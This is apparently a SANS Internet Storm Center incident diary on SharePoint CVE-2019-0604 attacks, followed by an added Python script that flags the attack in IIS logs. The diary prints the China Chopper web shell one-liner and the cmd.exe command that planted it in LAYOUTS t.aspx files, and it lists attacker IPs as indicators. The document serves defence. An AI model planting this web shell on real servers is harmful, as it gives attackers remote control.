CVE-2019-0604 Attack (Mon, May 20th)

Over the past week, I started seeing attacks on SharePoint servers using the vulnerability CVE-2019-0604. The Zero Day Initiative has a great write-up (1) on the exploitation of this vulnerability.

Initial detection of the exploit came from endpoint exploit detection. When reviewing the IIS logs, we saw a POST to Picker.aspx. This appears to be the most common entry point for attacks exploiting CVE-2019-0604.

Initial Log 
        2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 - 121.147.96.8 python-requests/2.18.4 200 0 0 670
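As an added example (not part of the diary), the following Python script parses IIS W3C log lines in the layout of the entry above and flags POST requests to Picker.aspx, cross-checking the client IP and user agent against the IOCs listed later in this diary. It assumes the default IIS field order, and the sample log lines are constructed.

```python
# Assumed default IIS W3C field order (matches the diary's entry); IIS writes
# spaces in the user agent as '+', so whitespace splitting is safe.
import re
from typing import Dict, List

FIELDS = ["date", "time", "s_ip", "method", "uri_stem", "uri_query", "port",
          "username", "c_ip", "user_agent", "status", "substatus",
          "win32_status", "time_taken"]

# IOCs from the diary, with the de-fanged brackets removed.
KNOWN_ATTACKER_IPS = {"121.147.96.8", "211.222.223.14", "119.65.36.2"}
KNOWN_USER_AGENT = "python-requests/2.18.4"
# Picker.aspx under any SharePoint hive (14/15/16) is the observed entry point.
PICKER_RE = re.compile(r"^/_layouts/(?:\d+/)?picker\.aspx$", re.IGNORECASE)

def parse_line(line: str) -> Dict[str, str]:
    """Parse one W3C log line; '#' directive lines and short lines yield {}."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) != len(FIELDS):
        return {}
    return dict(zip(FIELDS, parts))

def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry is suspicious; an empty list means benign."""
    reasons = []
    if entry.get("method") == "POST" and PICKER_RE.match(entry.get("uri_stem", "")):
        reasons.append("POST to Picker.aspx (CVE-2019-0604 entry point)")
    if entry.get("c_ip") in KNOWN_ATTACKER_IPS:
        reasons.append("client IP in diary IOC list")
    if entry.get("user_agent") == KNOWN_USER_AGENT:
        reasons.append("user agent matches diary IOC")
    return reasons

def scan(log_text: str) -> List[Dict[str, object]]:
    """Scan a whole log; each hit records the client IP, URI and the reasons."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        reasons = classify(entry) if entry else []
        if reasons:
            hits.append({"c_ip": entry["c_ip"], "uri": entry["uri_stem"], "reasons": reasons})
    return hits

# Constructed sample: the diary's entry, a benign authenticated GET, and a
# POST from an IP that is not in the IOC list (still flagged by the URI rule).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-05-02 07:04:13 192.168.1.1 POST /_layouts/15/Picker.aspx - 443 - 121.147.96.8 python-requests/2.18.4 200 0 0 670
2019-05-02 07:05:01 192.168.1.1 GET /_layouts/15/Picker.aspx - 443 CORP\\alice Mozilla/5.0+(Windows+NT+10.0) 200 0 0 12
2019-05-02 07:06:44 192.168.1.1 POST /_layouts/16/picker.aspx - 443 - 203.0.113.7 curl/7.64.0 500 0 0 80
"""
```

Run it against a real u_ex*.log file by passing its contents to scan(); a hit on the URI rule alone is worth investigating even when the IP and user agent are new.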

In the case of this attacker, they dropped a China Chopper payload on the server. China Chopper has been around for a long time; CrowdStrike did a great write-up (2) in 2015. The payload is just a one-liner that was echoed into the files from the command line.

       <%eval(Request.Item["t"],"unsafe");

The anomaly that the endpoint detection flagged was a cmd shell being spawned by the w3wp.exe (IIS worker) process.

      Parent Process: w3wp.exe
      Process Name: cmd.exe

        "C:\Windows\System32\cmd.exe" /c echo ^^ > "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx" & echo ^^ >
        "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx" & echo ^^ >
        "%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"

While the attack appears to be an automated drive-by, the attackers did not come back and make any additional modifications to the server.

IOCs

Attacker IPs:
121[.]147[.]96[.]8    
211[.]222[.]223[.]14 
119[.]65[.]36[.]2 

User agent string: python-requests/2.18.4

Chopper files created:
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\t.aspx"
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\t.aspx"
"%CommonProgramFiles%\Microsoft Shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\t.aspx"

(1) https://www.thezdi.com/blog/2019/3/13/cve-2019-0604-details-of-a-microsoft-sharepoint-rce-vulnerability
(2) https://www.crowdstrike.com/blog/chopping-packets-decoding-china-chopper-web-shell-traffic-over-ssl/

Thanks to my team for the analysis.

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.